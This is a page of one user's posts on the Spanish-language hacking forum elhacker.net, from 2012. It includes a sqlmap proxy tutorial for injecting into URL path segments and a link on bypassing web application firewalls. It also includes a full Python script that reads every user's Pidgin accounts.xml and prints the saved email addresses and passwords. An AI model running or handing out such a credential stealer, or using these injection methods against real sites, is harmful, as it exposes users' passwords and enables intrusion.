elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8
41  Seguridad Informática / Nivel Web / Re: [ayuda] Seguridad web de un usuario logueado en: 1 Abril 2012, 23:19 pm
nunca he utilizado ese programa pero revisa si tiene la opcion de enviar datos por post, la otra es generar una cookie( iniciando sesion en la web y cogiendo la cookie, tener en cuenta tanto User-Agent como referer ) y configurar para que utilize esa cookie.

for dummies : http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/readme/EN/w3af-users-guide.pdf    :silbar:
42  Programación / PHP / Re: ejecutar javascript con PHP (?) en: 22 Febrero 2012, 16:53 pm
gracis por responder, pero ya anoche habia logrado solucionar el problema, de todas formas me sirve bastante tu codigo  ;D.

saludos.
43  Programación / PHP / ejecutar javascript con PHP (?) en: 22 Febrero 2012, 02:11 am
estoy haciendo un script que se conecte a hotmail utilizando CURL , mi gran problema es que cuando intento inicar sesion, este detecta que no tengo javascript activado, eso es obvio ya que no ejecuto el script desde el navegador.

a alguien se le ocurre una idea??.

saludos.
44  Seguridad Informática / Nivel Web / Re: Duda con Sql Injection en Sql Map en: 12 Febrero 2012, 06:59 am
podrias dar mas info  :huh:   , por ejemplo, el tipo de injeccion, la cantidad de tablas, el dbms , y la version de sqlmap que utilizas  :huh:
45  Seguridad Informática / Nivel Web / simular inject_here en sqlmap[TUTORIAL + PROXY] en: 11 Febrero 2012, 04:57 am
Despues de haber perdido un par de horas de mi vida, intentando buscar algo parecido al
%IjectHere% de HAVIJ o un ${Inject_Here} como el de ACUNETIX en SQLMAP, primero tome la decision
de editar el codigo, pero me dio demasiada peresa, aparte que con una actualizacion volaba el codigo
asique me decidi mejor en hacer un mini proxy para el SQLMAP, les cuento como funciona.

primero echamos a andar el mini proxy, para esto necesitamos 3 parametros.

[1]PUERTO, de conexion entre el mini proxy y el sqlmap.(puede ser cualquiera :p)
[2]PARAMETRO, este es el parametro falso que modificara sqlmap(abajo explico ;)).
[3]URL, necesitamos la URL donde se encuentra la sqli, con EL TOKEN que nos indicara
   donde se encuentra el SQLI(Token por defecto "{fuck}").

un ejemplo seria asi ==> python proxySqlmap.py 4345 /cualquier_cosa.php?injectando= http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

PUERTO de conexion con el proxy => 4345
PARAMETRO falso                         => /cualquier_cosa.php?injectando=
URL  con el token, fijarse en {fuck} => http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

*El parametro falso debe coincidir tal cual con el que ponen en sqlmap.

donde el parametro identificador2 es el vulnerable(lee mas abajo y entenderas).
con esto dejamos nuestro proxy esperando conexiones en el puerto 4345.

¿como funciona?.
cuando ejecutamos sqlmap, lo hacemos de esta manera "python sqlmap.py -u "http://www.vulnerable.com.ar/carpeta1/ejecuta.php?id=3" -p id" , donde id es nuestra variable vulnerable a sqli, pero nosotros al tener un parametro vulnerable en otro lugar como es en mi caso, es asi "http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2/archivo.rar" , las variables vulnerables son identificador1 e identificador2 , no tenia como shit indicar que esas variables eran vulnerables entonces se me ocurrio hacer lo siguiente, utilizamos nuestro localhost(pueden subirlo a un host si desean ;) ), como si fuese el servidor con la url y apuntamos en sqlmap una variable falsa(cualquier nombre), SIN DARLE UN VALOR por lo menos en esta version no !!xD , en mi caso le pondre "/cualquier_cosa.php?injectando=" , tonces la url nos quedaria de esta manera "http://127.0.0.1/cualquier_cosa.php?injectando=" , ademas debemos agregar el puerto de conexion a nuestro proxy, al ejecutar el sqlmap nos quedaria asi "python sqlmap.py http://127.0.0.1:4345/cualquier_cosa.php?injectando= -p injectando" , esto quiere decir que se conectara a nuestro host(127.0.0.1), y que realizara las peticiones <"GET"> a nuestro host y a la variable "injectando" de la pagina "cualquier_cosa.php", por otro lado tenemos corriendo el proxy haciendo creer que se mejante pagina y variable existe.

Entonces tenemos 2 ventanas de cmd abiertas, una donde corre nuestro proxy y la otra de sqlmap ;) .

espero que a alguien le sirva.

codigo en python ==> http://pastebin.com/NR5sx9u6

una imagen para que vean como reemplaza la injeccion :


PD: por ahi alguien podria mejorar o optimizar el codigo ;).

EDIT: modifique unas cosillas.
46  Seguridad Informática / Nivel Web / Re: duda con sqlmap en: 11 Febrero 2012, 03:17 am
solucionado, tuve que realizarme un mini proxy para editar la injeccion, si desean que postee el mini proxy , me dicen y se los subo :p aunque lo mas probable que lo haga en estos dias ;)  34
47  Seguridad Informática / Nivel Web / duda con sqlmap[SOLUCIONADO] en: 9 Febrero 2012, 07:47 am
escribo nuevamente ya que tengo un problema, resulta que tengo una injeccion sql en ORACLE, el problema es que la url con el sqli es de esta forma http://www.asdfgf2w.com/asdf1/asdf2/asdf3/archivo.doc , donde asdf3 es el vulnerable a sqli  :o  , el problema es que nose como poner en sqlmap que me tome ese como el parametro vulnerable, alguien sabe ??.

mi primera idea fue realizar un wrapper xD , en otro servidor , con la url tipo http://asdf.com/asdf.php?var1=[SQLI] , pero el servidor es demasiado inestable :/

saludos.

48  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net v2.0 en: 3 Febrero 2012, 16:59 pm
no he dicho nada :)  ;D

saludos.
49  Seguridad Informática / Nivel Web / Re: Ayuda lógica para crear una tool SQLi en: 2 Febrero 2012, 05:50 am
Holas, como reto personal me he propuesto a crear una herramienta en python que me muestre el resultado de un SQLi similar a SQLMap, (se que reinvento la rueda pero estoy obsesionado por hacerlo por mi mismo y entenderlo)

Personalmente he probado que SQLMap no sabe saltarse los firewall y los he tenido que hacer todo manualmente

Mi única duda para empezar es.. como capturo los datos devueltos por una SQLi de la web que estoy escaneando??, quiero capturar los datos devueltos y mostrarlos en la consola en python como SQLMap pero tengo dudas de como capturarlo.

Pensaba usar regexp pero cada web tiene una diagramación distinta, alguien tiene alguna idea?

Saludos


será que no lo sabes utilizar ?? http://www.websec.mx/blog/ver/Evadiendo_Web_Application_Firewalls_con_SQLMap

PD: podrias echarle una mirada al source de sqlmap ;)
50  Programación / Scripting / Obtiene las cuentas guardadas de PIDGIN[PYTHON , LINUX] en: 26 Enero 2012, 20:37 pm
un simple script que obtiene las cuentas guardadas  del cliente de mensajeria PIDGIN.

probado en la version "Pidgin 2.6.6 (libpurple 2.6.6)"

Código
  1. ##############################################
  2. ## Obtiene las ccuentas guardadas de pidgin ##
  3. ## Mail: angelofthedark@live.com.ar         ##
  4. ##############################################
  5. import os
  6.  
  7. #funcion que obtiene las cuentas desde el archivo accounts.xml
  8. def obtenerCuentas( ruta ):
  9.    try:
  10.        h    = open(usu+cuentasXML)
  11.        src  = h.read()
  12.        tmp1 = src.split("<name>")
  13.        tmp2 = src.split("<password>")
  14.        for s in tmp1:
  15.            if "</name>" in s:
  16.                cuentas[0].append(s.split("</name>")[0])
  17.        for t in tmp2:
  18.            if "</password>" in t:
  19.                cuentas[1].append(t.split("</password")[0])
  20.    except:
  21.        print "Error, nose puede continuar !!"
  22.        exit(0)
  23.  
  24.  
  25. home       = "/home"
  26. cuentasXML = ".purple/accounts.xml"
  27. archivos   = os.listdir(home)
  28. usuarios   = []
  29. cuentas    = [[],[]] #cuentas[0][0] => mail ; cuentas[0][1] => password
  30.  
  31. for ar in archivos:
  32.    if os.path.isdir(home+"/"+ar):
  33.        usuarios.append(home+"/"+ar+"/")
  34.  
  35. for usu in usuarios:
  36.    obtenerCuentas( usu+cuentasXML )
  37.  
  38.  
  39. #imprime por pantalla el mail y el password.
  40. cont = 0
  41. for cnt in cuentas[0]:
  42.    print "+++++++++++++++("+str(cont)+")+++++++++++++++"
  43.    print "mail     ==> " + cnt
  44.    print "password ==> " + cuentas[1][cont]
  45.    cont+=1
  46.  
  47. print "+++++++++++++++(-.FIN.-)+++++++++++++++"


saludos.
Páginas: 1 2 3 4 [5] 6 7 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines